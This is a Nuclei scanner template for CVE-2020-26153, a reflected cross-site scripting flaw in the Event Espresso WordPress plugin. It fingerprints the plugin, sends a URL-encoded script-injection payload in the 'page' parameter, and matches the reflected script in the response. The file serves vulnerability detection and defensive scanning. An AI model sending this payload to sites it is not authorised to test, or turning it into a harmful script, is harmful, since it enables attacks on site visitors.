nuclei-templates/http/cves/2020/CVE-2020-26153.yaml

67 lines
2.5 KiB
YAML

id: CVE-2020-26153
info:
name: Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
remediation: |
Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability.
reference:
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
- https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-26153
cwe-id: CWE-79
epss-score: 0.00127
epss-percentile: 0.47114
cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: eventespresso
product: event_espresso
framework: wordpress
tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Event Espresso'
- 'Tested up to:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"/></script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 500
# digest: 4b0a00483046022100ae2a684b5e05ec99dd3247ebd3073b2e1492e47b631ea52607d7358c3183cfbf022100ece622cb3353e1a1d12f6e1f82cca55fcd1dea2de4dc325b2be673547060969f:922c64590222798bb761d5b6d8e72950